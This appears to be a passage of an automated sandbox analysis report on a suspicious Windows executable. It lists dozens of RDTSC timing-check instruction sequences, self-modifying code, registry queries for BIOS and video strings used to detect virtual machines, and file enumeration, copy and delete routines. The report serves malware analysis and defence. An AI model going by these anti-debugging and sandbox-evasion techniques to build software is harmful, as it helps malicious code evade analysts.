                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CD8A second address: F4CDA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30D3D456h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CDA7 second address: F4CDAC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D05D second address: F4D061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D061 second address: F4D06B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D06B second address: F4D07B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAB30D3D446h 0x00000008 jnl 00007FAB30D3D446h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D07B second address: F4D080 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D87B second address: F4D87F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4DA52 second address: F4DA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E20E second address: F4E215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E215 second address: F4E244 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Ch 0x00000007 jmp 00007FAB30C0632Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FAB30C0632Eh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E244 second address: F4E249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E249 second address: F4E24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C778 second address: F4C796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAB30D3D456h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F553A0 second address: F553A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54F3B second address: F54F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54F42 second address: F54F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FAB30C06337h 0x0000000b popad 0x0000000c pop ebx 0x0000000d jl 00007FAB30C06332h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F550D6 second address: F550F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAB30D3D453h 0x00000009 jnp 00007FAB30D3D446h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F550F3 second address: F55104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jno 00007FAB30C06326h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F62403 second address: F6240D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAB30D3D44Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F62529 second address: F62536 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAB30C06328h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F652B0 second address: F652B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F652B4 second address: F652C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FAB30C0632Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73BA3 second address: F73BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73BAE second address: F73BC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C06332h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73BC6 second address: F73BE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAB30D3D457h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73BE1 second address: F73BF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C06334h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F75AB7 second address: F75AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAB30D3D446h 0x0000000a popad 0x0000000b jmp 00007FAB30D3D458h 0x00000010 jc 00007FAB30D3D448h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 push edx 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F75920 second address: F7592B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7592B second address: F75949 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FAB30D3D451h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a jnp 00007FAB30D3D446h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F75949 second address: F75968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FAB30C06326h 0x00000010 jmp 00007FAB30C0632Fh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7DF63 second address: F7DF69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7DF69 second address: F7DF6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7DF6F second address: F7DF79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAB30D3D446h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7DF79 second address: F7DFAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FAB30C0632Bh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007FAB30C0633Ch 0x00000016 pushad 0x00000017 jp 00007FAB30C06326h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7CE45 second address: F7CE4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7CE4B second address: F7CE58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FAB30C06326h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7CE58 second address: F7CE5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7CE5C second address: F7CE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FAB30C06326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7CE6E second address: F7CE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30D3D459h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7D12B second address: F7D12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7D12F second address: F7D15E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAB30D3D459h 0x0000000f pushad 0x00000010 jp 00007FAB30D3D446h 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7DCE6 second address: F7DCEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7DCEC second address: F7DCF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7DCF0 second address: F7DCF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E52A second address: F8E52E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E52E second address: F8E549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007FAB30C0632Ah 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B3BE second address: E9B3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAB30D3D446h 0x0000000a pop ecx 0x0000000b jmp 00007FAB30D3D452h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F90503 second address: F9050A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F90359 second address: F9035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9035F second address: F9037F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jne 00007FAB30C0632Eh 0x0000000f pushad 0x00000010 je 00007FAB30C06326h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9037F second address: F903A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30D3D458h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jl 00007FAB30D3D446h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F953B7 second address: F953DC instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAB30C06339h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jg 00007FAB30C06326h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96C9F second address: F96CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96CA3 second address: F96CA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96CA7 second address: F96CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAB30D3D446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FAB30D3D446h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96CBB second address: F96CC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88D01 second address: E88D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D44Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88D16 second address: E88D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30C06332h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88D2C second address: E88D7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D451h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jmp 00007FAB30D3D459h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop ecx 0x00000016 pushad 0x00000017 jmp 00007FAB30D3D44Dh 0x0000001c ja 00007FAB30D3D446h 0x00000022 jg 00007FAB30D3D446h 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3C30 second address: FB3C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30C0632Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3F77 second address: FB3F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnc 00007FAB30D3D45Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3F9A second address: FB3FD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FAB30C06326h 0x0000000b jng 00007FAB30C06326h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jmp 00007FAB30C0632Ch 0x0000001a jmp 00007FAB30C06332h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB414A second address: FB4150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB4715 second address: FB4738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FAB30C06326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FAB30C0632Fh 0x00000011 js 00007FAB30C0632Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB4BA4 second address: FB4BA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB7F19 second address: FB7F1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB7F1D second address: FB7F96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FAB30D3D448h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 add dx, 51ACh 0x00000029 push dword ptr [ebp+122D2602h] 0x0000002f jng 00007FAB30D3D45Ch 0x00000035 call 00007FAB30D3D44Fh 0x0000003a mov dword ptr [ebp+122D29A7h], edx 0x00000040 pop edx 0x00000041 call 00007FAB30D3D449h 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FAB30D3D458h 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB7F96 second address: FB7F9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB7F9C second address: FB7FA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FAB30D3D446h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB7FA6 second address: FB7FBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007FAB30C0632Ah 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB7FBD second address: FB7FC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB7FC3 second address: FB7FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB92CF second address: FB92F1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jc 00007FAB30D3D446h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push esi 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 jmp 00007FAB30D3D44Ah 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBAFE6 second address: FBAFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E92EC4 second address: E92EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30D3D457h 0x00000009 jmp 00007FAB30D3D44Ch 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E92EEC second address: E92F21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C06331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jp 00007FAB30C06328h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAB30C06333h 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E92F21 second address: E92F25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBCAA6 second address: FBCAAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F80488 second address: 4F8049A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov ebx, 6CC29764h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8049A second address: 4F8049F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8049F second address: 4F804C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D458h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F804C1 second address: 4F8050E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FAB30C06332h 0x0000000f sub esi, 629DDC78h 0x00000015 jmp 00007FAB30C0632Bh 0x0000001a popfd 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FAB30C06335h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8058B second address: 4F8059B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAB30D3D44Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8059B second address: 4F805C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FAB30C0632Ch 0x00000010 sbb ch, FFFFFF88h 0x00000013 jmp 00007FAB30C0632Bh 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b mov si, 8815h 0x0000001f rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D1DAE2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D1DB36 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: ECBEBA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-38353
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A440F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00A440F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00A3E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A3F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A447C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00A447C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A31710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A31710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00A3DB80
